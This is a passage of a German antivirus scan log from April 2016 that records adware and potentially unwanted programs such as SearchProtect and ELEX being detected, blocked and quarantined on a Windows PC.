      enthält folgendes Muster 'Adware/ELEX.xwll' [adware]
      Ausgeführte Aktion(en):
      Die Datei wurde ins Quarantäneverzeichnis unter dem Namen '51cc3403.qua' 
      verschoben!

10.04.2016 20:46 [System-Scanner] Malware gefunden
      Die Datei 'C:\Users\Harun\AppData\Local\Temp\676367343\ic-0.7552d281d18108.exe'
      enthält folgendes Muster 'Adware/ConvertAd.878154' [adware]
      Ausgeführte Aktion(en):
      Die Datei wurde ins Quarantäneverzeichnis unter dem Namen '502c0d45.qua' 
      verschoben!

10.04.2016 20:42 [Echtzeit-Scanner] Malware gefunden
      Muster 'ADWARE/ELEX.xwll [adware]'
      in Datei 'C:\Users\Harun\AppData\Local\Temp\istAAD0.tmp\qksee.exe gefunden.
      Durchgeführte Aktion: Zugriff verweigern

10.04.2016 20:42 [Echtzeit-Scanner] Malware gefunden
      Muster 'ADWARE/ConvertAd.878154 [adware]'
      in Datei 'C:\Users\Harun\AppData\Local\Temp\676367343\ic-0.7552d281d18108.exe 
      gefunden.
      Durchgeführte Aktion: Zugriff verweigern

10.04.2016 20:40 [System-Scanner] Malware gefunden
      Die Datei 'C:\Program Files (x86)\eAHPeNhIUJ\Uninstall.exe'
      enthält folgendes Muster 'Adware/ELEX.pjws' [adware]
      Ausgeführte Aktion(en):
      Die Datei wurde ins Quarantäneverzeichnis unter dem Namen '51b701fa.qua' 
      verschoben!

10.04.2016 20:39 [Echtzeit-Scanner] Malware gefunden
      Muster 'ADWARE/ELEX.pjws [adware]'
      in Datei 'C:\Program Files (x86)\eAHPeNhIUJ\Uninstall.exe gefunden.
      Durchgeführte Aktion: Zugriff verweigern

10.04.2016 20:38 [Echtzeit-Scanner] Malware gefunden
      Muster 'ADWARE/ELEX.pjws [adware]'
      in Datei 'C:\Program Files (x86)\eAHPeNhIUJ\Uninstall.exe gefunden.
      Durchgeführte Aktion: Zugriff verweigern

10.04.2016 20:01 [Echtzeit-Scanner] Malware gefunden
      Muster 'ADWARE/ELEX.pjws [adware]'
      in Datei 'C:\Program Files (x86)\eAHPeNhIUJ\Uninstall.exe gefunden.
      Durchgeführte Aktion: Zugriff verweigern

10.04.2016 17:33 [System-Scanner] Malware gefunden
      Die Datei 'C:\Users\Harun\Downloads\xfire_installer_CB-DL-Manager.exe'
      enthält folgendes Muster 'PUA/DownloadGuide.MK' [riskware]
      Ausgeführte Aktion(en):
      Beim Versuch eine Sicherungskopie der Datei anzulegen ist ein Fehler 
      aufgetreten und die Datei wurde nicht gelöscht. Fehlernummer: 26003.
      Die Datei konnte nicht gelöscht werden!
      Es wird versucht die Aktion mit Hilfe der ARK Library durchzuführen.
      Die Datei wurde ins Quarantäneverzeichnis unter dem Namen '187c971e.qua' 
      verschoben!

10.04.2016 17:31 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/DownloadGuide.MK [riskware]'
      in Datei 'C:\Users\Harun\Downloads\xfire_installer_CB-DL-Manager.exe gefunden.
      Durchgeführte Aktion: Zugriff verweigern

10.04.2016 17:31 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/DownloadGuide.MK [riskware]'
      in Datei 'C:\Users\Harun\Downloads\xfire_installer_CB-DL-Manager.exe gefunden.
      Durchgeführte Aktion: Zugriff verweigern

10.04.2016 17:30 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/DownloadGuide.MK [riskware]'
      in Datei 'C:\Users\Harun\Downloads\xfire_installer_CB-DL-Manager.exe gefunden.
      Durchgeführte Aktion: Zugriff verweigern

10.04.2016 17:30 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/DownloadGuide.MK [riskware]'
      in Datei 'C:\Users\Harun\Downloads\xfire_installer_CB-DL-Manager.exe gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

10.04.2016 17:30 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/DownloadGuide.MK [riskware]'
      in Datei 'C:\Users\Harun\Downloads\xfire_installer_CB-DL-Manager.exe gefunden.
      Durchgeführte Aktion: Zugriff verweigern

10.04.2016 17:30 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/DownloadGuide.MK [riskware]'
      in Datei 'C:\Users\Harun\Downloads\xfire_installer_CB-DL-Manager.exe gefunden.
      Durchgeführte Aktion: Zugriff verweigern

10.04.2016 17:29 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/DownloadGuide.MK [riskware]'
      in Datei 'C:\Users\Harun\Downloads\xfire_installer_CB-DL-Manager.exe gefunden.
      Durchgeführte Aktion: Zugriff verweigern

10.04.2016 17:29 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/DownloadGuide.MK [riskware]'
      in Datei 'C:\Users\Harun\Downloads\xfire_installer_CB-DL-Manager.exe gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

10.04.2016 17:29 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/DownloadGuide.MK [riskware]'
      in Datei 'C:\Users\Harun\Downloads\xfire_installer_CB-DL-Manager.exe gefunden.
      Durchgeführte Aktion: Zugriff verweigern

10.04.2016 17:29 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/DownloadGuide.MK [riskware]'
      in Datei 'C:\Users\Harun\Downloads\xfire_installer_CB-DL-Manager.exe gefunden.
      Durchgeführte Aktion: Zugriff verweigern

09.04.2016 17:46 [System-Scanner] Malware gefunden
      Die Datei 'C:\ProgramData\eAHPeNhIUJ\protect\protect.exe'
      enthält folgendes Muster 'Adware/ELEX.epcr' [adware]
      Ausgeführte Aktion(en):
      Beim Versuch eine Sicherungskopie der Datei anzulegen ist ein Fehler 
      aufgetreten und die Datei wurde nicht gelöscht. Fehlernummer: 26003.
      Die Datei konnte nicht gelöscht werden!
      Es wird versucht die Aktion mit Hilfe der ARK Library durchzuführen.
      Die Datei wurde ins Quarantäneverzeichnis unter dem Namen '067feebd.qua' 
      verschoben!
      Der Registrierungseintrag 
      <HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\eAHPeNhIUJ_protect\ImagePa
      th> wurde erfolgreich repariert.
      Der Registrierungseintrag 
      <HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\eAHPeNhIUJ_protect\ImagePath> 
      wurde erfolgreich repariert.

09.04.2016 15:13 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC32.dll 
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

09.04.2016 15:13 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\Main\bin\CltMngSvc.exe gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

09.04.2016 15:13 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC32Loader.dll 
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

09.04.2016 15:13 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC64.dll 
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

09.04.2016 15:13 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC64Loader.dll 
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

09.04.2016 15:13 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC32.dll 
      gefunden.
      Durchgeführte Aktion: Zugriff verweigern

09.04.2016 09:44 [System-Scanner] Malware gefunden
      Die Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC64.dll'
      enthält folgendes Muster 'PUA/SearchProtect.Gen' [riskware]
      Ausgeführte Aktion(en):
      Die Datei wurde ins Quarantäneverzeichnis unter dem Namen '7cf612fb.qua' 
      verschoben!

09.04.2016 09:44 [System-Scanner] Malware gefunden
      Die Datei 'C:\Program Files 
      (x86)\SearchProtect\SearchProtect\bin\VC32Loader.dll'
      enthält folgendes Muster 'PUA/SearchProtect.Gen' [riskware]
      Ausgeführte Aktion(en):
      Die Datei wurde ins Quarantäneverzeichnis unter dem Namen '5ad23591.qua' 
      verschoben!

09.04.2016 09:44 [System-Scanner] Malware gefunden
      Die Datei 'C:\Program Files 
      (x86)\SearchProtect\SearchProtect\bin\VC64Loader.dll'
      enthält folgendes Muster 'PUA/SearchProtect.Gen' [riskware]
      Ausgeführte Aktion(en):
      Die Datei wurde ins Quarantäneverzeichnis unter dem Namen '705b4183.qua' 
      verschoben!

09.04.2016 09:44 [System-Scanner] Malware gefunden
      Die Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC32.dll'
      enthält folgendes Muster 'PUA/SearchProtect.Gen' [riskware]
      Ausgeführte Aktion(en):
      Die Datei wurde ins Quarantäneverzeichnis unter dem Namen '3f0b6547.qua' 
      verschoben!

09.04.2016 09:44 [System-Scanner] Malware gefunden
      Die Datei 'C:\Program Files (x86)\SearchProtect\Main\bin\CltMngSvc.exe'
      enthält folgendes Muster 'PUA/SearchProtect.Gen' [riskware]
      Ausgeführte Aktion(en):
      Die Datei wurde ins Quarantäneverzeichnis unter dem Namen '00ab73e4.qua' 
      verschoben!

09.04.2016 09:42 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC32.dll 
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

09.04.2016 09:42 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\Main\bin\CltMngSvc.exe gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

09.04.2016 09:42 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC32Loader.dll 
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

09.04.2016 09:42 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC64.dll 
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

09.04.2016 09:42 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC64Loader.dll 
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

09.04.2016 09:42 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC32.dll 
      gefunden.
      Durchgeführte Aktion: Zugriff verweigern

08.04.2016 20:55 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC32Loader.dll 
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

08.04.2016 20:55 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC32.dll 
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

08.04.2016 20:55 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC64.dll 
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

08.04.2016 20:55 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC64Loader.dll 
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

08.04.2016 20:55 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\Main\bin\CltMngSvc.exe gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

08.04.2016 20:55 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC32.dll 
      gefunden.
      Durchgeführte Aktion: Zugriff verweigern

07.04.2016 22:42 [System-Scanner] Malware gefunden
      Die Datei 'C:\Program Files (x86)\SearchProtect\Main\bin\CltMngSvc.exe'
      enthält folgendes Muster 'PUA/SearchProtect.Gen' [riskware]
      Ausgeführte Aktion(en):
      Beim Versuch eine Sicherungskopie der Datei anzulegen ist ein Fehler 
      aufgetreten und die Datei wurde nicht gelöscht. Fehlernummer: 26004.
      Die Quelldatei konnte nicht gefunden werden.
      Es wird versucht die Aktion mit Hilfe der ARK Library durchzuführen.
      Die Datei konnte nicht ins Quarantäneverzeichnis verschoben werden!
      Fehler in der ARK Library.

07.04.2016 22:38 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC32Loader.dll 
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

07.04.2016 22:38 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC32.dll 
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

07.04.2016 22:38 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC64.dll 
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

07.04.2016 22:38 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC64Loader.dll 
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

07.04.2016 22:38 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\Main\bin\CltMngSvc.exe gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

07.04.2016 22:38 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC32.dll 
      gefunden.
      Durchgeführte Aktion: Zugriff verweigern

07.04.2016 22:38 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\Main\bin\CltMngSvc.exe gefunden.
      Durchgeführte Aktion: Zugriff verweigern

07.04.2016 17:32 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\Main\bin\CltMngSvc.exe gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

07.04.2016 17:32 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC64.dll 
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

07.04.2016 17:32 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC32.dll 
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

07.04.2016 17:32 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC64Loader.dll 
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

07.04.2016 17:32 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC32Loader.dll 
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

07.04.2016 17:32 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC32.dll 
      gefunden.
      Durchgeführte Aktion: Zugriff verweigern

07.04.2016 17:32 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\Main\bin\CltMngSvc.exe gefunden.
      Durchgeführte Aktion: Zugriff verweigern

04.04.2016 19:31 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC64.dll 
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

04.04.2016 19:31 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC64Loader.dll 
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

04.04.2016 19:31 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC32Loader.dll 
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

04.04.2016 19:31 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC32.dll 
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

04.04.2016 19:31 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\Main\bin\CltMngSvc.exe gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

04.04.2016 19:31 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC32.dll 
      gefunden.
      Durchgeführte Aktion: Zugriff verweigern

03.04.2016 14:31 [System-Scanner] Malware gefunden
      Die Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC32.dll'
      enthält folgendes Muster 'PUA/SearchProtect.Gen' [riskware]
      Ausgeführte Aktion(en):
      Beim Versuch eine Sicherungskopie der Datei anzulegen ist ein Fehler 
      aufgetreten und die Datei wurde nicht gelöscht. Fehlernummer: 26004.
      Die Quelldatei konnte nicht gefunden werden.
      Es wird versucht die Aktion mit Hilfe der ARK Library durchzuführen.
      Die Datei konnte nicht ins Quarantäneverzeichnis verschoben werden!
      Fehler in der ARK Library.

03.04.2016 14:23 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC64.dll 
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

03.04.2016 14:23 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC32.dll 
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

03.04.2016 14:23 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\Main\bin\CltMngSvc.exe gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

03.04.2016 14:23 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC64Loader.dll 
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

03.04.2016 14:23 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC32Loader.dll 
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

03.04.2016 14:23 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC32.dll 
      gefunden.
      Durchgeführte Aktion: Zugriff verweigern

03.04.2016 13:04 [System-Scanner] Malware gefunden
      Die Datei 'C:\Program Files (x86)\SearchProtect\Main\bin\CltMngSvc.exe'
      enthält folgendes Muster 'PUA/SearchProtect.Gen' [riskware]
      Ausgeführte Aktion(en):
      Beim Versuch eine Sicherungskopie der Datei anzulegen ist ein Fehler 
      aufgetreten und die Datei wurde nicht gelöscht. Fehlernummer: 26004.
      Die Quelldatei konnte nicht gefunden werden.
      Es wird versucht die Aktion mit Hilfe der ARK Library durchzuführen.
      Die Datei konnte nicht ins Quarantäneverzeichnis verschoben werden!
      Fehler in der ARK Library.

03.04.2016 13:01 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC64.dll 
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

03.04.2016 13:01 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC32Loader.dll 
      gefunden.
      Durchgeführte Aktion: Zugriff verweigern

03.04.2016 13:01 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC32.dll 
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

03.04.2016 13:01 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC32Loader.dll 
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

03.04.2016 13:01 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC64Loader.dll 
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

03.04.2016 13:01 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\Main\bin\CltMngSvc.exe gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

02.04.2016 11:43 [System-Scanner] Malware gefunden
      Die Datei 'C:\Program Files (x86)\SearchProtect\Main\bin\CltMngSvc.exe'
      enthält folgendes Muster 'PUA/SearchProtect.Gen' [riskware]
      Ausgeführte Aktion(en):
      Beim Versuch eine Sicherungskopie der Datei anzulegen ist ein Fehler 
      aufgetreten und die Datei wurde nicht gelöscht. Fehlernummer: 26004.
      Die Quelldatei konnte nicht gefunden werden.
      Es wird versucht die Aktion mit Hilfe der ARK Library durchzuführen.
      Die Datei konnte nicht ins Quarantäneverzeichnis verschoben werden!
      Fehler in der ARK Library.

02.04.2016 11:40 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC64.dll 
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

02.04.2016 11:40 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC32.dll 
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

02.04.2016 11:40 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\Main\bin\CltMngSvc.exe gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

02.04.2016 11:40 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC64Loader.dll 
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

02.04.2016 11:40 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC32Loader.dll 
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

02.04.2016 11:40 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC32.dll 
      gefunden.
      Durchgeführte Aktion: Zugriff verweigern

01.04.2016 20:41 [System-Scanner] Malware gefunden
      Die Datei 'C:\Program Files (x86)\WinTaske\WinTaske\WinTaske.exe'
      enthält folgendes Muster 'PUA/YesSearch.Gen' [riskware]
      Ausgeführte Aktion(en):
      Beim Versuch eine Sicherungskopie der Datei anzulegen ist ein Fehler 
      aufgetreten und die Datei wurde nicht gelöscht. Fehlernummer: 26004.
      Die Quelldatei konnte nicht gefunden werden.
      Es wird versucht die Aktion mit Hilfe der ARK Library durchzuführen.
      Die Datei konnte nicht ins Quarantäneverzeichnis verschoben werden!
      Die Datei existiert nicht!

01.04.2016 20:41 [System-Scanner] Malware gefunden
      Die Datei 'C:\Program Files (x86)\Winsere\Winsere\Winsere.exe'
      enthält folgendes Muster 'ADWARE/ELEX.Gen (Cloud)' [adware]
      Ausgeführte Aktion(en):
      Die Datei wurde ins Quarantäneverzeichnis unter dem Namen '15ae1a2b.qua' 
      verschoben!
      Der Registrierungseintrag 
      <HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Winsere\ImagePath> wurde 
      erfolgreich repariert.
      Der Registrierungseintrag 
      <HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Winsere\ImagePath> wurde 
      erfolgreich repariert.

01.04.2016 20:41 [System-Scanner] Malware gefunden
      Die Datei 'C:\Program Files (x86)\ffgogogo Browser\bin\browserServer.exe'
      enthält folgendes Muster 'HEUR/APC (Cloud)' [heuristic]
      Ausgeführte Aktion(en):
      Die Datei wurde ins Quarantäneverzeichnis unter dem Namen '47f040c3.qua' 
      verschoben!
      Der Registrierungseintrag 
      <HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\FFModules\ImagePath> 
      wurde erfolgreich repariert.
      Der Registrierungseintrag 
      <HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\FFModules\ImagePath> wurde 
      erfolgreich repariert.

01.04.2016 20:41 [System-Scanner] Malware gefunden
      Die Datei 'C:\Program Files 
      (x86)\eAHPeNhIUJ\eAHPeNhIUJ\bin\eAHPeNhIUJ_server.exe'
      enthält folgendes Muster 'HEUR/APC (Cloud)' [heuristic]
      Ausgeführte Aktion(en):
      Die Datei wurde ins Quarantäneverzeichnis unter dem Namen '5f4c6f5e.qua' 
      verschoben!
      Der Registrierungseintrag 
      <HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\eAHPeNhIUJ_update\ImagePat
      h> wurde erfolgreich repariert.
      Der Registrierungseintrag 
      <HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\eAHPeNhIUJ_update\ImagePath> 
      wurde erfolgreich repariert.

01.04.2016 20:41 [System-Scanner] Malware gefunden
      Die Datei 'C:\Program Files (x86)\qksee\qksee.exe'
      enthält folgendes Muster 'Adware/ELEX.xwll' [adware]
      Ausgeführte Aktion(en):
      Die Datei wurde ins Quarantäneverzeichnis unter dem Namen '49a97b0a.qua' 
      verschoben!

01.04.2016 18:56 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC32Loader.dll 
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

01.04.2016 18:56 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC32.dll 
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

01.04.2016 18:56 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC64.dll 
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

01.04.2016 18:56 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC64Loader.dll 
      gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

01.04.2016 18:56 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\Main\bin\CltMngSvc.exe gefunden.
      Durchgeführte Aktion: Übergeben an Scanner

01.04.2016 18:56 [Echtzeit-Scanner] Malware gefunden
      Muster 'PUA/SearchProtect.Gen [riskware]'
      in Datei 'C:\Program Files (x86)\SearchProtect\SearchProtect\bin\VC32.dll 
      gefunden.
